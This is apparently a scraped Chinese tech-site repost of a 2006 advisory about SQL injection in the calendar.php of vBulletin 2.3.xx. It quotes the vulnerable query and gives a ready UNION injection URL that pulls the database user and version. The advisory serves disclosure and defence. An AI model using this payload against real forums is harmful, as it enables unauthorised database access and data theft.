vBulletin Forum 2.3.xx SQL Injection


Posted in PHP onOctober 09, 2006

vBulletin Forum 2.3.xx SQL Injection There exist a sql injection problem in calendar.php.

-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit")
{
      $eventinfo = $DB_site->query_first("SELECT allowsmilies,public,userid,
eventdate,event,subject FROM calendar_events WHERE eventid = $eventid");
-----------------------------------------------------

If the MySQL version is greater than 4.00, a UNION attack could be used.

-----------------------------------------
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_ev
ents%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
-----------------------------------------

The query_first function will only return the first row of the query result, so make sure it returns !
the one you want.

PHP 相关文章推荐
PHPShop存在多个安全漏洞
Oct 09 PHP
php 分页类 扩展代码
Jun 11 PHP
深入理解PHP之require/include顺序 推荐
Jan 02 PHP
PHP时间格式控制符对照表分享
Jul 23 PHP
php汉字转拼音的示例
Feb 27 PHP
使用PHPMailer实现邮件发送代码分享
Oct 23 PHP
简单了解WordPress开发中update_option()函数的用法
Jan 11 PHP
PHP判断JSON对象是否存在的方法(推荐)
Jul 06 PHP
PHP jQuery+Ajax结合写批量删除功能
May 19 PHP
基于ThinkPHP5.0实现图片上传插件
Sep 25 PHP
laravel5.1框架基础之Blade模板继承简单使用方法分析
Sep 05 PHP
如何在PHP环境中使用ProtoBuf数据格式
Jun 19 PHP
PHP_Flame(Version:Progress)的原代码
Oct 09 #PHP
图形数字验证代码
Oct 09 #PHP
用PHP函数解决SQL injection
Oct 09 #PHP
session 的生命周期是多长
Oct 09 #PHP
做个自己站内搜索引擎
Oct 09 #PHP
用libTemplate实现静态网页的生成
Oct 09 #PHP
php注入实例
Oct 09 #PHP
You might like
php下检测字符串是否是utf8编码的代码
2008/06/28 PHP
php数组函数序列之array_unique() - 去除数组中重复的元素值
2011/10/29 PHP
typecho插件编写教程(二):写一个新插件
2015/05/28 PHP
ThinkPHP数据操作方法总结
2015/09/28 PHP
多广告投放代码 推荐
2006/11/13 Javascript
网页javascript精华代码集
2007/01/24 Javascript
jquery实现表格奇数偶数行不同样式(有图为证及实现代码)
2013/01/23 Javascript
如何防止回车(enter)键提交表单
2014/05/11 Javascript
jQuery窗口、文档、网页各种高度的精确理解
2014/07/02 Javascript
javascript常用代码段搜集
2014/12/04 Javascript
sso跨域写cookie的一段js脚本(推荐)
2016/05/25 Javascript
有关文件上传 非ajax提交 得到后台数据问题
2016/10/12 Javascript
真正好用的js验证上传文件大小的简单方法
2016/10/27 Javascript
js 递归和定时器的实例解析
2017/02/03 Javascript
vue父组件通过props如何向子组件传递方法详解
2017/08/16 Javascript
vue组件发布到npm简单步骤
2017/11/30 Javascript
详解vue表单——小白速看
2018/04/08 Javascript
Element-ui tree组件自定义节点使用方法代码详解
2018/09/17 Javascript
JS大坑之19位数的Number型精度丢失问题详解
2019/04/22 Javascript
layer弹出层自适应高度,垂直水平居中的实现
2019/09/16 Javascript
详解JavaScript 异步编程
2020/07/13 Javascript
Nest.js 授权验证的方法示例
2021/02/22 Javascript
Python编程argparse入门浅析
2018/02/07 Python
python使用pymongo操作mongo的完整步骤
2019/04/13 Python
python 画3维轨迹图并进行比较的实例
2019/12/06 Python
巴西24小时在线药房:Droga Raia
2020/05/12 全球购物
求职信需要的五点内容
2014/02/01 职场文书
商务英语广告词大全
2014/03/18 职场文书
南京青奥会口号
2014/06/12 职场文书
动画设计系毕业生求职信
2014/07/15 职场文书
家庭财产分割协议范文
2014/11/24 职场文书
《颐和园》教学反思
2016/02/19 职场文书
2019森林防火宣传标语大全!
2019/07/03 职场文书
2019企业文化管理制度范本!
2019/08/06 职场文书
数据库连接池
2021/04/06 MySQL
详解SQL的窗口函数
2022/04/21 Oracle